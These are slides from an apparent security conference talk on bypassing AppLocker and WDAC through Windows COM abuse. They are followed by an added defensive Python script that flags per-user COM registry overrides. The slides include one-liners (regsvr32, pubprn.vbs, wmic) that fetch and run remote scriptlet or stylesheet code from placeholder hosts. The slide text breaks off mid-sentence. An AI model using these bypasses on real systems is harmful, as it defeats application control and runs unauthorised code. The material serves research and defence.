COM Under the Radar


Circumventing Application Control Solutions

Figure: Game Icons [1]

> Whoami
◦ Jimmy Bayne | @bohops
◦ Security Assessor & Researcher @ByLightLLC
◦ From Baltimore, MD area
◦ Towson University Alum
◦ First BSides Talk
◦ Community Projects
  ◦ Blog | bohops.com
  ◦ LOLBAS | lolbas-project.github.io
Figure: Global Dispatch [2]

> Agenda
◦ COM Overview
◦ Application Control Overview
◦ Application Control Bypasses
◦ Defensive Considerations
…ready…set…go!

> COM Overview
What is COM?
◦ COM = Component Object Model
◦ A binary interface for software interoperability
◦ Facilitates function calls between components (Middleware) [1]
◦ Technologies – DCOM, OLE, Automation, ActiveX Controls, etc.
Terminology
◦ Interface: A definition for exposing COM functionality, including methods and properties
◦ Class: An ‘implementation’ of a group of COM interfaces that serves as a template for a COM object [2]
◦ Object (Component): An instance of a COM class
◦ Instantiation: The creation or activation of an object (instance)
[1] https://www.cs.umd.edu/~pugh/com/
[2] https://docs.microsoft.com/en-us/windows/desktop/com/com-class-objects-and-clsids

> COM Overview
Registered COM
◦ Registry keys direct the activation of COM objects
◦ COM class data is located in the HKCR Registry hive
  ◦ The data is merged from the \Software\Classes keys of the HKLM and HKCU hives
  ◦ Key Values in HKCU take precedence over values in HKLM
◦ Notable key structure in HKCR\CLSID\
  ◦ CLSID – Class Identifier ({GUID} Format)
  ◦ InprocServer32 – In-Process COM Server Implementation (DLL, OCX)
  ◦ LocalServer32 – Out-of-Process COM Server Implementation (EXE)
  ◦ ProgID/VersionIndependentProgID – COM class object friendly name
*Note: There are other interesting keys as well

> COM Overview
Registered COM
Figure labels: COM Class ID {CLSID}; COM Server In Process Server Binary Path; COM Object Programmatic Identifiers (Friendly Name)

> COM Overview
COM Example: COM Object Instantiation
Figure labels: “Version Independent” ProgID Friendly Name; Interface ID (IID) [IWshShell3 Interface]; IWshShell3 Interface Methods & Properties; Exec Method Call

> COM Overview
COM Abuse Vectors
◦ Active Scripting
  ◦ Script Engines (Languages) – JScript, VBScript
  ◦ Script Hosts – (Signed) Binaries that execute script code
  ◦ ‘Facilitators’ – (Signed) Binaries that ‘enable’ script host-code execution (e.g. lolbins)
◦ PowerShell
• COM Functionality
• Registration
• Resolution
• Features/Capabilities

> COM Resources
James Forshaw (@tiraniddo)
Matt Nelson (@enigma0x3)
Rob Maslen (@rbmaslen)
Casey Smith (@subTee)
https://www.youtube.com/watch?v=dfMuzAZRGm4
https://www.youtube.com/watch?v=3gz1QmiMhss
https://www.youtube.com/watch?v=xmbjRP5W-yk
Source: Natty Boh Gear [5]

> Application Control Overview
Application Control is the practice of restricting unauthorized code execution
Approaches
◦ Whitelists
◦ Blocklists
◦ Hybrid
Application Control ≈ Application Whitelisting (AWL)
Two major Microsoft solutions
◦ AppLocker
◦ WDAC (Device Guard)
Figure: Wikipedia [4]

> AppLocker
◦ Available since Windows 2008 Server & Windows 7 Enterprise
◦ Configured through Group Policy
◦ Supported Modes: Enforcement & Audit
◦ Rule Collections: Executable, Installer, Scripts, Packages, DLLs
◦ Rule Conditions: File Hash, Path, & Publisher
◦ Default Rules - Enforced Configuration
  ◦ Built-In option for setting baseline rule set
◦ Places PowerShell in Constrained Language Mode (CLM)
◦ [-] Not code integrity aware
◦ [-] Not considered a security boundary
◦ [+] Less overhead to implement

> WDAC
◦ Available since Windows 2016 Server & Windows 10 Enterprise
◦ Configured through PowerShell cmdlets
◦ Supported Modes: Enforcement & Audit
◦ Rule Conditions: File Hash, File Name, Publisher, Signing Cert, etc.
◦ Default Rules - Enforced Configuration
  ◦ XML Policy - %systemroot%\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Enforced.xml
◦ Places PowerShell in Constrained Language Mode (CLM)
◦ [+] Code integrity aware (UMCI)
◦ [+] Considered a security boundary
◦ [-] More administrative overhead (maybe…)

> PowerShell
◦ PowerShell - “a task-based command-line shell and scripting language built on .NET” (Microsoft Docs)
◦ COM object support (e.g. new-object cmdlet)
◦ Great for Dev/IT Management
◦ (Not so) Great for hackers and Red Teams
◦ PowerShell Version 5(.1) Enhancements
  ◦ Detection optics (when enabled)
    ◦ Script block logging, module logging, and transcription
  ◦ Constrained Language Mode (CLM) support
    ◦ Restricts sensitive language elements
    ◦ Not a security boundary
    ◦ “Implementation” determines effectiveness
Source: Wiki Media [6]

> COM: Circumventing AppLocker
◦ Default Rules
  ◦ Gaps in Path rules allow for the execution of any script or executable
  ◦ Unprivileged users can “write to” interesting paths
Source: https://gist.github.com/api0cradle/563226464376d40e191ce53abcf9c4d0

> COM: Circumventing AppLocker
◦ 50 Shades of Squiblydoo
  ◦ Most variants abuse COM/DLL Registration
  ◦ Leverages scriptlet component files (.sct) and the script(let) run-time component (scrobj.dll)
  ◦ Component files can create objects and run unsigned script code
Figure: Scriptlet Component File (“sct”)
Source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/RegSvr32.sct

> COM: Circumventing AppLocker
50 Shades of Squiblydoo (Examples)
◦ regsvr32.exe /s /n /u /i:http://url/file.sct scrobj.dll
◦ cscript.exe pubprn.vbs 127.0.0.1 script:http://someurl/file.sct
◦ cmstp.exe /s file.inf
◦ rundll32.exe advpack.dll,LaunchINFSection file.inf,DefaultInstall,1,
◦ rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 c:\path to file.inf
Credits
Casey Smith (@subTee)
Matt Nelson (@enigma0x3)
Nick Tyrer (@NickTyrer)
Kyle Hanslovan (@KyleHanslovan)

> COM: Circumventing AppLocker
XML Stylesheet Transformation (XSLT)
◦ Intended for transforming XML docs into other outputs
◦ Under the hood, variant technique abuses MSXML COM objects (interface methods and properties)
◦ XML Transform functions can execute embedded script code

> COM: Circumventing AppLocker
XML Stylesheet Transformation (XSLT)
wmic process get /format:"https://example.com/evil.xsl"
http://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html (Credit: Casey Smith - @subTee)

> COM: Circumventing AppLocker
PowerShell CLM
◦ CLM restricts unapproved script execution, cmdlets, arbitrary types, type definitions, etc.
◦ However, the new-object cmdlet can instantiate COM objects under AppLocker “enforcement”
◦ Example: PowerShell XML Stylesheet Transform

> AppLocker Resources
Adam Chester (@_xpn_)
Oddvar Moe (@Oddvarmoe)
https://blog.xpnsec.com/constrained-language-mode-bypass/
https://www.youtube.com/watch?v=zw21CbNeAjA

> COM: Circumventing WDAC
Windows Lockdown Policy (WLDP)
• is activated when WDAC enforces a code integrity policy (UMCI = Enabled)
• is included with “enlightened” script hosts and engines (as wldp.dll)
• exports a function called WldpIsClassInApprovedList(), which is called to validate if a CLSID is safe
• facilitates the instantiation of a COM (class) object if deemed safe
Potential COM WDAC Bypass Conditions
• Discovering script hosts that are not WLDP enlightened
• Manipulating trusted hosts/scripts/cmdlets to execute arbitrary/unsigned code
• Discovering script host/engine WLDP code implementation flaws for evading WldpIsClassInApprovedList() (e.g. false reliance/oversight)
• Discovering ‘unsafe’ COM objects that are in the approved list
• Re-introducing old code that is still trusted

> COM: Circumventing WDAC
CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass
◦ Under the WLDP enforced by UMCI, COM object instantiation is locked down to only a few COM objects. When this was initially tested, only the following objects were accessible:
◦ The Microsoft.XMLDOM.1.0 (Microsoft.XMLDOM) object was the most interesting.
Source: https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/

> COM: Circumventing WDAC
CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass
◦ A review of the exposed methods revealed various transform* functions

> COM: Circumventing WDAC
CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass
◦ With transformNode and a simple XSLT, we were able to bypass WDAC and execute unsigned script code

> COM: Circumventing WDAC
AWL Bypass: Catalog Hygiene
◦ After CVE-2018-8492 was patched, the Microsoft.XMLDOM COM object could no longer be used to execute scriptlet code under the WDAC policy
◦ Microsoft patched and released a new MSXML3.dll (the COM server)

> COM: Circumventing WDAC
AWL Bypass: Catalog Hygiene
◦ While re-building a new WDAC test machine, a test case came to mind: WDAC Bypass Replay
◦ For testing, a few versions of previous MSXML3.dll (and dependency) files were copied to the new WDAC test machine.
◦ Interestingly, a previous unpatched DLL of the same Microsoft build series was still digitally signed

> COM: Circumventing WDAC
AWL Bypass: Catalog Hygiene
◦ A deeper look into the signature properties confirmed that it was catalog signed and revealed the path of the catalog file

> COM: Circumventing WDAC
AWL Bypass: Catalog Hygiene
◦ For testing, the COM Class Registry Keys from HKLM were exported to a .reg file for COM Key Hijacking
◦ Modifications were made for HKCU and the InprocServer32 path to point to the ‘legacy’ binary

> COM: Circumventing WDAC
AWL Bypass: Catalog Hygiene
◦ After importing the .reg file back into the registry, the COM class keys were “hijacked” and merged with HKCR

> COM: Circumventing WDAC
AWL Bypass: Catalog Signature Hygiene
◦ Sure enough, a replay
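
The slides state that HKCU values take precedence over HKLM when HKCR is merged, and the Catalog Hygiene test relies on an HKCU InprocServer32 entry shadowing the machine-wide one. As a defender's check for that condition (an added example, not code from the talk), the Python below compares two .reg exports and reports every CLSID whose per-user server path replaces a different HKLM path. It assumes the exports were taken from HKCU\Software\Classes\CLSID and HKLM\Software\Classes\CLSID and already decoded to text; the CLSIDs, paths and user name in the sample data are constructed.

```python
import re

SERVER_SUBKEYS = ("inprocserver32", "localserver32")
KEY_RE = re.compile(
    r"^\[(HKEY_[A-Z_]+)\\Software\\Classes\\CLSID\\(\{[0-9A-F-]{36}\})\\([^\\\]]+)\]$",
    re.I,
)

def decode_value(raw):
    """Decode REG_SZ ("...") or REG_EXPAND_SZ (hex(2):...) data from a .reg line."""
    if raw.startswith('"') and raw.endswith('"'):
        return re.sub(r"\\(.)", r"\1", raw[1:-1])        # undo \\ and \" escapes
    if raw.lower().startswith("hex(2):"):
        data = bytes(int(b, 16) for b in raw[7:].split(",") if b.strip())
        return data.decode("utf-16-le").rstrip("\x00")
    return raw

def parse_servers(reg_text):
    """Map (hive, CLSID, subkey) -> default value for COM server subkeys."""
    reg_text = re.sub(r",\\\r?\n\s*", ",", reg_text)      # join hex continuation lines
    servers, current = {}, None
    for line in (l.strip() for l in reg_text.splitlines()):
        if line.startswith("["):
            m = KEY_RE.match(line)
            current = None
            if m and m.group(3).lower() in SERVER_SUBKEYS:
                current = (m.group(1).upper(), m.group(2).upper(), m.group(3).lower())
        elif current and line.startswith("@="):
            servers[current] = decode_value(line[2:])
    return servers

def normalise(path, system_root=r"c:\windows"):
    """Lower-case, unquote and expand %SystemRoot% so paths can be compared.
    The system_root default is an assumption about the host."""
    p = path.strip().strip('"').lower()
    return p.replace("%systemroot%", system_root).replace("%windir%", system_root)

def find_hkcu_overrides(hkcu_text, hklm_text):
    """Report CLSIDs whose HKCU server path replaces a different HKLM one."""
    user, machine = parse_servers(hkcu_text), parse_servers(hklm_text)
    findings = []
    for (hive, clsid, sub), user_path in sorted(user.items()):
        machine_path = machine.get(("HKEY_LOCAL_MACHINE", clsid, sub))
        if hive != "HKEY_CURRENT_USER" or machine_path is None:
            continue                                       # per-user only: nothing shadowed
        if normalise(user_path) == normalise(machine_path):
            continue
        findings.append({
            "clsid": clsid,
            "subkey": sub,
            "hklm_server": machine_path,
            "hkcu_server": user_path,                      # what activation resolves to
            "outside_system_root": not normalise(user_path).startswith("c:\\windows\\"),
        })
    return findings

# ---- constructed sample exports (not taken from the talk) ----
def _hex2(s, split_at=12):
    """Render s as a REG_EXPAND_SZ export, including one continuation line."""
    hexed = [f"{b:02x}" for b in (s + "\0").encode("utf-16-le")]
    return "hex(2):" + ",".join(hexed[:split_at]) + ",\\\n  " + ",".join(hexed[split_at:])

CLSID_A = "{11111111-2222-3333-4444-555555555555}"   # constructed placeholder
CLSID_B = "{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}"   # constructed placeholder
HKLM_DLL = r"%SystemRoot%\System32\msxml3.dll"

SAMPLE_HKLM = (
    "Windows Registry Editor Version 5.00\n\n"
    f"[HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{CLSID_A}\\InprocServer32]\n"
    f"@={_hex2(HKLM_DLL)}\n"
    '"ThreadingModel"="Both"\n'
)
SAMPLE_HKCU = (
    "Windows Registry Editor Version 5.00\n\n"
    f"[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{CLSID_A}\\InprocServer32]\n"
    + r'@="C:\\Users\\alice\\legacy\\msxml3.dll"' + "\n"
    '"ThreadingModel"="Both"\n\n'
    f"[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{CLSID_B}\\InprocServer32]\n"
    + r'@="C:\\Users\\alice\\AppData\\Local\\App\\shellext.dll"' + "\n"
)

if __name__ == "__main__":
    for f in find_hkcu_overrides(SAMPLE_HKCU, SAMPLE_HKLM):
        print(f)
```

Per-user COM registrations with no HKLM counterpart (the second CLSID in the sample) are common for legitimately installed software, so only entries that shadow a machine-wide class are reported.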